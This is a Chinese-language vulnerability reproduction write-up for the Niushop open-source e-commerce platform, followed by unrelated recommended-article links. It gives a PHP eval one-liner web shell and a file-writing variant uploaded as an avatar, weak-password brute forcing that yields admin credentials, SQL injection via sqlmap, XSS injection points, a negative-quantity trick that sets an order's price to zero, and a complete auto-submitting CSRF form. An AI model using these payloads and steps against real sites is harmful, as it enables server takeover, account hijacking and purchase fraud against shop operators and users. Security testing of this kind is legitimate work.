Niushop开源商城(漏洞复现)

文件上传漏洞

注册一个账号后登录

在个人中心修改个人头像

选择我们的图片马

#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php 
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); 
?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的.php就行

弱口令

使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

#用户名
admin
#密码
admin1

成功登录

SQL注入漏洞

基于布尔时间盲注

第一个存在点

使用sqlmap跑一下

第二个存在点

二次外带注入

XSS漏洞

存储型

1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位

反射型

1.后台--微信--消息管理素材管理-->添加消息存储-->标题

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作修改用户信息链接

修改用户信息

BP抓包;制作SCRF

复制下来制作链接

<html>

<!-- CSRF PoC - generated by Burp Suite Professional -->

<body>

<form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">

<input type="hidden" name="user&#95;name" value="bbbcdff" />

<input type="hidden" name="real&#95;name" value="11wsdasa" />

<input type="hidden" name="birthday" value="1970&#45;01&#45;01" />

<input type="hidden" name="location" value="'onclick&#61;'alert&#40;1&#41;'" />

<input type="hidden" name="user&#95;qq" value="2461" />

<input type="hidden" name="act" value="act&#95;edit&#95;profile" />

<input type="hidden" name="submit" value="ç&#161;&#174;è&#174;&#164;ä&#191;&#174;æ&#148;&#185;å&#159;ºæ&#156;&#172;ä&#191;&#161;æ&#129;&#175;" />

<input type="submit" value="Submit request" />

</form>

<script>

history.pushState('', '', '/');

document.forms[0].submit();

</script>

</body>

</html>

用户在已登录的状态点击我们的链接

相关推荐
C4rpeDime2 小时前
自建MD5解密平台-续
android
鲤籽鲲4 小时前
C# Random 随机数 全面解析
android·java·c#
在肯德基吃麻辣烫5 小时前
使用开源在线聊天工具Fiora轻松搭建个性化聊天平台在线交流
开源
蜜獾云5 小时前
linux firewalld 命令详解
linux·运维·服务器·网络·windows·网络安全·firewalld
是小崔啊6 小时前
开源轮子 - EasyExcel01(核心api)
java·开发语言·开源·excel·阿里巴巴
m0_548514778 小时前
2024.12.10——攻防世界Web_php_include
android·前端·php
洛阳泰山8 小时前
MaxKB基于大语言模型和 RAG的开源知识库问答系统的快速部署教程
人工智能·语言模型·开源·rag·maxkb
凤邪摩羯8 小时前
Android-性能优化-03-启动优化-启动耗时
android
凤邪摩羯8 小时前
Android-性能优化-02-内存优化-LeakCanary原理解析
android
喀什酱豆腐8 小时前
Handle
android